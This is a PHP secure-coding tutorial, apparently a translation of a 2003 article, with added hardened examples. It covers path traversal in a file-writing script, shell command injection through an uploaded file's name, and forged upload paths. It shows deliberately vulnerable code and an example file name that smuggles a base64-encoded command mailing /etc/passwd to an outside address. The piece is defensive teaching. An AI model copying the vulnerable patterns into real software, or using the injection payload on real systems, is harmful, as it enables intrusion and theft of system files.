PHP Security and Related Topics

2008-12-22 08:10:36   Source: Internet

This article is a pinyin transliteration of the Chinese translation of "PHP 安全及相关" (PHP Security and Related Topics), rendered here in English.
  The importance of paying attention to security

  What you see is not all there is

  The most effective, yet most often overlooked, way to stop users from maliciously abusing your program is to think about how it could be abused while you are writing the code. Watching for possible security problems in code is important. Consider the following example function, intended to simplify writing to a large number of text files from PHP:
  <?php
  function write_text($filename, $text="") {
      static $open_files = array();
      // If the filename is empty, close all open files and forget their handles
      if ($filename == NULL) {
          foreach($open_files as $fr) {
              fclose($fr);
          }
          $open_files = array();
          return true;
      }
      $index = md5($filename);
      if(!isset($open_files[$index])) {
          // Open for appending; only cache the handle if the open succeeded
          $fh = fopen($filename, "a+");
          if(!$fh) return false;
          $open_files[$index] = $fh;
      }
      fputs($open_files[$index], $text);
      return true;
  }
  ?>
  This function takes two parameters: the filename and the text to write to it (the second defaults to an empty string).
  The function first checks whether the file is already open; if so, it reuses the existing file handle. Otherwise it opens the file itself. In both cases the text is written to the file.
  If the filename passed to the function is NULL, all open files are closed instead. A usage example follows.
  If a developer writes several text files in the manner below, the code is much clearer and easier to read.
  Let us assume the function lives in a separate file that the calling code includes.
  Here is such a program, which we will call quotes.php:
  <html><body>
  <form action="<?=$_SERVER['PHP_SELF']?>" method="get">
  Choose the nature of the quote:
  <select name="quote" size="3">
    <option value="funny">Humorous quotes</option>
    <option value="political">Political quotes</option>
    <option value="love">Romantic Quotes</option>
  </select><br />
  The quote: <input type="text" name="quote_text" size="30" />
  <input type="submit" value="Save Quote" />
  </form>
  </body></html>
  <?php
  include_once('write_text.php');
  // Deliberately vulnerable: the file name comes straight from the query string
  $filename = "/home/web/quotes/{$_GET['quote']}";
  $quote_msg = $_GET['quote_text'];
  if (write_text($filename, $quote_msg)) {
      echo "<center><hr><h2>Quote saved!</h2></center>";
  } else {
      echo "<center><hr><h2>Error writing quote</h2></center>";
  }
  write_text(NULL);
  ?>
  As you can see, the developer has used write_text() to build a system in which users can submit their favourite quotes, which are stored in a text file.
  Unfortunately, the developer may not have realised that this program also lets a malicious user compromise the security of the web server.
  Perhaps you are now scratching your head over how this innocent-looking program introduces a security risk.
  If you cannot see it, consider the following URL, remembering that the program is called quotes.php:
http://www.somewhere.com/fun/quotes.php?quote=different_file.dat&quote_text=garbage+data
  What happens when this URL is sent to the web server?
  Obviously quotes.php is executed, but instead of writing the quote into one of the three files we intended, a new file called different_file.dat is created containing the string "garbage data".
  Clearly this is not the behaviour we want. A malicious user could set quote to ../../../etc/passwd to reach the UNIX password file and create an account (although this requires the web server to run the program as the superuser; if that is the case, stop reading and go fix it right now).
  If /home/web/quotes/ is reachable through the browser, probably the most serious problem with this program is that it lets any user write, and then run, an arbitrary PHP script. That would bring no end of trouble.
  There are several remedies. If you only need to write to a handful of files in a directory, consider keeping the file names in an associative array and writing only when the user's input is found in that array. Another approach is to strip every character that is not a letter or digit, so that no directory separators survive. Yet another is to check the file extension to guarantee the file will never be executed by the web server.
  The principle is simple: as a developer you have to think beyond how the program behaves in the cases you expect.
  What happens if invalid data arrives in a form element? Can a malicious user make your program behave in ways you did not intend? What will stop such attacks? Your web server and your PHP programs are only as secure as their weakest link, so it is important to verify that each potentially weak link is actually secure.
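The remedies listed above, combined into one hardened replacement for the file-name handling in quotes.php. This is an added example, not code from the original article; quote_file_path() and save_quote() are assumed helper names, and the demo uses a temporary directory in place of /home/web/quotes. It applies an allowlist of permitted names, rejects anything but letters and digits, forces a fixed non-executable extension, and checks that the resolved path really sits inside the quotes directory.

```php
<?php
// Added example (not from the original article): hardened file-name handling for quotes.php.
// quote_file_path() and save_quote() are assumed names; the temp directory stands in for
// /home/web/quotes so the script runs offline.

/** Map a user-supplied category to a safe absolute path under $dir, or return false. */
function quote_file_path($category, array $allowed, $dir)
{
    // 1. Allowlist: only the values the <select> offers are ever written.
    if (!in_array($category, $allowed, true)) {
        return false;
    }
    // 2. Belt and braces: no "/", "\", "." or NUL byte can reach the filesystem call.
    if (!preg_match('/^[A-Za-z0-9]+$/', $category)) {
        return false;
    }
    // 3. Fixed ".txt" extension (never parsed as PHP) and a containment check on the
    //    resolved directory, so a bad allowlist entry still cannot escape $dir.
    $base = realpath($dir);
    $path = $dir . '/' . $category . '.txt';
    if ($base === false || realpath(dirname($path)) !== $base) {
        return false;
    }
    return $path;
}

/** Append one quote as a single line under an exclusive lock; true on success. */
function save_quote($path, $quote)
{
    // Collapse CR/LF so a user cannot forge extra records in the file.
    $line = str_replace(array("\r", "\n"), ' ', $quote);
    return file_put_contents($path, $line . "\n", FILE_APPEND | LOCK_EX) !== false;
}

// Constructed demo directory standing in for /home/web/quotes.
$quote_dir = sys_get_temp_dir() . '/quotes_demo';
if (!is_dir($quote_dir)) {
    mkdir($quote_dir, 0700);
}
$allowed = array('funny', 'political', 'love');

// The hostile inputs from the text alongside legitimate ones.
foreach (array('funny', 'different_file.dat', '../../../etc/passwd', 'love') as $input) {
    $p = quote_file_path($input, $allowed, $quote_dir);
    printf("%-22s => %s\n", $input, $p === false ? 'REJECTED' : $p);
}

// A request handler would do exactly this with $_GET['quote'] and $_GET['quote_text'].
$path = quote_file_path('funny', $allowed, $quote_dir);
echo ($path !== false && save_quote($path, "A joke\nwith a forged second line"))
    ? "Quote saved!\n" : "Error writing quote\n";
```

The allowlist alone already closes the hole; the character filter and the realpath() containment check are there so that a later edit to the allowlist (or a symlink dropped into the directory) cannot silently reopen it.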
  Common security design mistakes

  Here are some key points: a brief, incomplete list of coding and administrative mistakes that can compromise security.

  Mistake 1. Trusting data

  This is the theme running through my whole discussion of PHP program security: you must never trust data that comes from outside. Whether it arrives from a user-submitted form, a file on the filesystem, or an environment variable, no data can simply be taken at face value. User input must therefore be validated and normalised before it is used.

  Mistake 2. Storing sensitive data in the web directory

  Any and all sensitive data should be kept in files separate from the programs that need it, in a directory that cannot be reached through the browser. When the data is needed, pull it into the appropriate PHP program with an include or require statement.

  Mistake 3. Ignoring the recommended security precautions

  The PHP manual contains a complete chapter on security precautions for deploying and writing PHP programs. It also explains, mostly through examples, when a potential risk exists and how to reduce it to a minimum. Malicious users rely on developers' and administrators' mistakes to obtain security-relevant information or gain privileges on the system. Heed these warnings and take the appropriate measures to cut down the chances of a malicious user doing real damage to your system.

  Executing system calls in PHP

  There are many ways to execute system calls from PHP. For instance, system(), exec(), passthru(), popen() and the backtick (`) operator all let your program run system commands. Used improperly, these functions open the door for a malicious user to execute system commands on your server. As with file access, in the overwhelming majority of cases the hole arises when untrusted external input finds its way into a system command.

  An example program using system calls

  Consider a program that handles an HTTP file upload, compresses the file with the zip utility and then moves it to a designated directory (by default /usr/local/archives/). The code is as follows:
  <?php
  $zip = "/usr/bin/zip";
  $store_path = "/usr/local/archives/";
  if (isset($_FILES['file'])) {
      $tmp_name = $_FILES['file']['tmp_name'];
      // Deliberately vulnerable: the client-supplied name goes into a shell command unescaped
      $cmp_name = dirname($_FILES['file']['tmp_name']) .
                  "/{$_FILES['file']['name']}.zip";
      $filename = basename($cmp_name);
      if (file_exists($tmp_name)) {
          $systemcall = "$zip $cmp_name $tmp_name";
          $output = `$systemcall`;
          if (file_exists($cmp_name)) {
              $savepath = $store_path.$filename;
              rename($cmp_name, $savepath);
          }
      }
  }
  ?>
  <form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
  <input type="HIDDEN" name="MAX_FILE_SIZE" value="1048576">
  File to compress: <input name="file" type="file"><br />
  <input type="submit" value="Compress File">
  </form>
  Although this program looks simple and straightforward, a malicious user can exploit it in several ways. The most serious problem is where we execute the compress command (through the ` operator), as the following lines make plain:
  if (isset($_FILES['file'])) {
      $tmp_name = $_FILES['file']['tmp_name'];
      $cmp_name = dirname($_FILES['file']['tmp_name']) .
                  "/{$_FILES['file']['name']}.zip";
      $filename = basename($cmp_name);
      if (file_exists($tmp_name)) {
          $systemcall = "$zip $cmp_name $tmp_name";
          $output = `$systemcall`;
          ...
  Tricking the program into running arbitrary shell commands

  Although this code looks reasonably safe, it carries the latent danger that any user with permission to upload a file can execute arbitrary shell commands!
  Precisely, the hole comes from the assignment to $cmp_name. Here we want the compressed file to carry the name the file had on the client (with a .zip extension added), so we use $_FILES['file']['name'], which holds the uploaded file's name on the client machine.
  Given that, a malicious user can get what they want simply by uploading a file whose name contains characters with special meaning to the underlying operating system. For example, what if a user creates an empty file as follows (at a UNIX shell prompt)?
  [user@localhost]# touch ";php -r '$code=base64_decode(
  "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
  system($code);';"
  This command creates a file with the following name:
  ;php -r '$code=base64_decode(
  "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
  system($code);';
  Looks odd? Looking at this "file name" more closely, we find it looks very much like a command telling the CLI version of PHP to run the following code:
  <?php
  $code=base64_decode(
  "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
  system($code);
  ?>
  If you are curious and display the contents of $code, you will find it holds mail baduser@somewhere.com < /etc/passwd. If the user hands this file to the program, then when PHP executes the system call to compress the file, what PHP actually runs is:
  /usr/bin/zip /tmp/;php -r
  '$code=base64_decode(
  "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
  system($code);';.zip /tmp/phpY4iatI
  Astonishingly, the line above is not one command but three! Because the UNIX shell treats a semicolon (;) as the end of one command and the start of the next unless the semicolon is inside quotes, the system call (here, PHP's backtick operator) actually executes:
  [user@localhost]# /usr/bin/zip /tmp/
  [user@localhost]# php -r
  '$code=base64_decode(
  "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
  system($code);'
  [user@localhost]# .zip /tmp/phpY4iatI
  As you can see, this apparently harmless PHP program has suddenly become a back door for running arbitrary shell commands and other PHP programs. Although this particular example only works on systems with the CLI version of PHP on the path, the same technique can achieve the same effect by other means.

  Countering system call attacks

  The key point remains: input from users, whatever it contains, must not be trusted! The question is how to avoid situations like this when using system calls (short of not using them at all). To counter this kind of attack, PHP provides two functions, escapeshellarg() and escapeshellcmd().
  escapeshellarg() is designed to neutralise potentially dangerous characters in user input that is used as an argument to a system command (in our example, the zip command). Its syntax is:
  escapeshellarg($string)
  where $string is the input to be filtered and the return value is the filtered string. The function wraps the whole string in single quotes and rewrites every single quote already in it as '\'' (closing the quoted region, adding a literal quote and reopening it), so the shell sees the entire value as one argument. In our example, if we add these lines before executing the system command:
  $cmp_name = escapeshellarg($cmp_name);
  $tmp_name = escapeshellarg($tmp_name);
  we avoid the risk by ensuring that every argument passed to the system call has been processed and is treated as plain user data, never as shell syntax.
  escapeshellcmd() is similar to escapeshellarg(), except that it only backslash-escapes the characters that have special meaning to the underlying operating system (and escapes quotes only when they are unpaired). Unlike escapeshellarg(), escapeshellcmd() does not quote the string or touch the whitespace in it. For example, when escaped with escapeshellcmd(), the string
  $string = "'hello, world!';evilcommand"
  becomes:
  'hello, world!'\;evilcommand
  The semicolon is now literal, but because the result is not wrapped in quotes, any unquoted whitespace in the input would still make the shell split it into separate arguments (here the paired single quotes happen to hold hello, world! together, so the shell sees the single word hello, world!;evilcommand). escapeshellcmd() is meant for a whole command line; when user input forms part of a system call's argument list, escapeshellarg() is the better choice.
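To make the difference between the two functions concrete, here is an added example (not code from the original article) that runs both over the hostile file name from the upload example and asks the shell how many arguments it would actually receive, using printf in place of zip so nothing harmful runs. build_zip_command() and shell_argument_count() are assumed helper names; /usr/bin/zip and the /tmp paths are the article's own values.

```php
<?php
// Added example (not from the original article): escapeshellarg() versus escapeshellcmd()
// on the attacker's file name. build_zip_command() and shell_argument_count() are assumed
// names; printf stands in for zip so the demonstration executes nothing dangerous.

// The attacker's "file name" exactly as PHP would receive it in $_FILES['file']['name'].
$hostile = ';php -r \'$code=base64_decode("bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");system($code);\';';

/** Build the zip command line with each value passed as exactly one quoted argument. */
function build_zip_command($zip, $cmp_name, $tmp_name)
{
    return $zip . ' ' . escapeshellarg($cmp_name) . ' ' . escapeshellarg($tmp_name);
}

/** Ask the shell how many arguments one escaped word turns into (one printf line each). */
function shell_argument_count($escaped_word)
{
    $out = shell_exec('printf "%s\n" ' . $escaped_word);
    return $out === null ? 0 : substr_count($out, "\n");
}

$cmp_name = '/tmp/' . $hostile . '.zip';
$tmp_name = '/tmp/phpY4iatI';

echo "Unsafe command line (the shell runs three commands):\n  /usr/bin/zip $cmp_name $tmp_name\n\n";
echo "With escapeshellarg() (one command, two arguments):\n  "
    . build_zip_command('/usr/bin/zip', $cmp_name, $tmp_name) . "\n\n";

// escapeshellarg() wraps the value in single quotes and rewrites each embedded single
// quote as '\'' so the shell can never leave the quoted region; the ; becomes literal.
// escapeshellcmd() only backslash-escapes metacharacters (quotes only when unpaired)
// and leaves spaces alone, which suits a whole command line but not a single argument.
$string = "'hello, world!';evilcommand";
echo "escapeshellcmd: " . escapeshellcmd($string) . "\n";
echo "escapeshellarg: " . escapeshellarg($string) . "\n\n";

// Let the shell itself report the argument boundaries for the hostile name.
printf("hostile name -> %d argument(s) after escapeshellcmd(), %d after escapeshellarg()\n",
       shell_argument_count(escapeshellcmd($cmp_name)),
       shell_argument_count(escapeshellarg($cmp_name)));
```

Run it with the PHP CLI; the last line shows that escapeshellcmd() stops the semicolon from starting a new command but still lets the spaces in the name split it into several arguments, while escapeshellarg() delivers it as one.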
  Protecting uploaded files

  Throughout this article I have focused on how system calls can be hijacked by malicious users to produce results we do not want.
  But there is another potential security risk worth mentioning. Looking back at our example, concentrate on these lines:
  $tmp_name = $_FILES['file']['tmp_name'];
  $cmp_name = dirname($_FILES['file']['tmp_name']) .
  "/{$_FILES['file']['name']}.zip";
  $filename = basename($cmp_name);
  if (file_exists($tmp_name)) {
  The potential risk in this fragment lies in the last line, where we check whether the uploaded file actually exists (that is, whether the temporary file $tmp_name exists).
  This risk does not come from PHP itself, but from the possibility that the name stored in $tmp_name is not a freshly uploaded file at all but points at a file the malicious user wants to reach, for example /etc/passwd.
  To prevent this, PHP provides is_uploaded_file(), which works like file_exists() but additionally checks that the file really was uploaded from the client during the current request.
  In most cases you will need to move the uploaded file; for this PHP provides move_uploaded_file() as the companion to is_uploaded_file(). It moves a file just like rename(), except that it automatically verifies before acting that the file being moved is an uploaded file. Its syntax is:
  move_uploaded_file($filename, $destination);
  When executed, the function moves the uploaded file $filename to the destination $destination and returns a boolean indicating whether the operation succeeded.
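Putting the upload checks together with the argument escaping from the previous section, here is a hardened version of the upload handler as an added example (not code from the original article). archive_upload() is an assumed helper name; /usr/bin/zip and the /tmp temporary name are the article's own values, and the $_FILES entries at the bottom are constructed so the script can be run offline. It moves the upload with move_uploaded_file() first, derives the archive name from a sanitised basename rather than the raw client name, and only then runs zip with every argument escaped.

```php
<?php
// Added example (not from the original article): hardened upload handler.
// archive_upload() is an assumed helper name; the $_FILES entries below are constructed.

/**
 * Validate one $_FILES entry, store it under $store_path and return the archive path,
 * or a string beginning with "error:" explaining why it was refused.
 */
function archive_upload(array $file, $store_path, $zip = '/usr/bin/zip')
{
    // 1. PHP's own upload status must report a completed transfer.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return 'error: upload did not complete';
    }
    // 2. The temp name must be a file PHP created for this request;
    //    file_exists() would happily accept /etc/passwd here.
    if (!is_uploaded_file($file['tmp_name'])) {
        return 'error: tmp_name is not an uploaded file';
    }
    // 3. Never trust the client name: keep only the basename, then only safe characters.
    $name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($file['name']));
    if ($name === '' || $name[0] === '.') {
        return 'error: unusable file name';
    }
    $dest    = rtrim($store_path, '/') . '/' . $name;
    $archive = $dest . '.zip';
    if (file_exists($dest) || file_exists($archive)) {
        return 'error: name already in use';
    }
    // 4. move_uploaded_file() re-checks the upload status and refuses anything else.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'error: could not move upload';
    }
    // 5. Every argument is quoted, so even a hostile original name could not break out;
    //    the sanitised name cannot carry shell metacharacters in the first place.
    $cmd = escapeshellarg($zip) . ' -j ' . escapeshellarg($archive) . ' ' . escapeshellarg($dest);
    exec($cmd, $output, $status);
    unlink($dest);
    return $status === 0 ? $archive : 'error: zip failed with status ' . $status;
}

// Constructed $_FILES entries: the attack from the text (tmp_name pointing at a system
// file) and a hostile client-side name. Neither is a real upload, so both are refused.
$forged = array(
    'name'     => 'report.txt',
    'tmp_name' => '/etc/passwd',
    'error'    => UPLOAD_ERR_OK,
);
echo archive_upload($forged, sys_get_temp_dir()), "\n";

$hostile = array(
    'name'     => ';php -r \'system("id");\';',
    'tmp_name' => '/tmp/phpY4iatI',
    'error'    => UPLOAD_ERR_OK,
);
echo archive_upload($hostile, sys_get_temp_dir()), "\n";
```

In a real request handler the call is archive_upload($_FILES['file'], '/usr/local/archives/'); the ordering matters: the file is moved to a path the application chose before any external program touches it, so a forged tmp_name never reaches zip.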
  Note: John Coggeshall is a PHP consultant and author. He has been contributing to PHP for about five years.
  English original: http://www.onlamp.com/pub/a/php/2003/08/28/php_foundations.html